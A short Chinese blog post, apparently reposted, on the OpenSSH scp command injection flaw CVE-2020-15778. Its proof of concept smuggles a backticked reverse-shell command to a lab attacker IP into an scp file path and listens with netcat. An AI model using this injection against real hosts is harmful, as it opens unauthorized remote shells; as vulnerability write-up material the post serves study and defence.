OpenSSH的scp命令注入漏洞(CVE-2020-15778) - 走看看

zoukankan html css js c++ java

OpenSSH的scp命令注入漏洞(CVE-2020-15778)
OpenSSH的scp命令注入漏洞(CVE-2020-15778)

影响版本：OpenSSH =< 8.3p1

scp 是 secure copy 的缩写。在linux系统中，scp用于linux之间复制文件和目录，基于 ssh 登陆进行安全的远程文件拷贝命令。该命令由openssh的scp.c及其他相关代码实现。

poc利用：
在向远程主机拷贝文件时，文件的路径会追加到本地scp命令后，当执行本地scp命令时，scp不会检查、过滤和清除文件名。这使得攻击者执行带有反引号的有效scp命令时，本地shell还将执行反引号中的命令。
```
查看OpenSSH的版本
ssh -V

反弹shell：
kali：192.168.1.111
openssh主机：192.168.1.194

scp zwish.php root@192.168.1.194:'`bash -i >& /dev/tcp/192.168.1.111/4444 0>&1`'

kali监听：nc -lvp 4444
```
比较鸡肋的是需要知道登录的ssh用户的密码。
这里尝试禁止某个ssh用户远程登录，但他必须经过密码的身份验证才能反弹shell，所以可利用的场景实在是想不到
1、网上搜资料说可以在authorized_key文件可以设置允许SCP单不允许SSH实际登陆
2、可能会用在回弹shell
查看全文

相关阅读:
Python从菜鸟到高手（2）：清空Python控制台
 Python爬虫黑科技(经验)
Python黑科技：6行代码轻松搭建FTP服务器
 Python黑科技：FuckIt.py
Python黑科技：在家远程遥控公司电脑，python+微信一键连接！
Python黑科技 | Python中四种运行其他程序的方式
 python3.x使用cxfreeze将.p打包成.exe
【python 应用之四】提升 Python 运行性能的 7 个习惯
 JSF标签之f:facet 的使用方法
 windows快捷键之打开网络连接

原文地址：https://www.cnblogs.com/zw1sh/p/13823190.html

Copyright © 2011-2022 走看看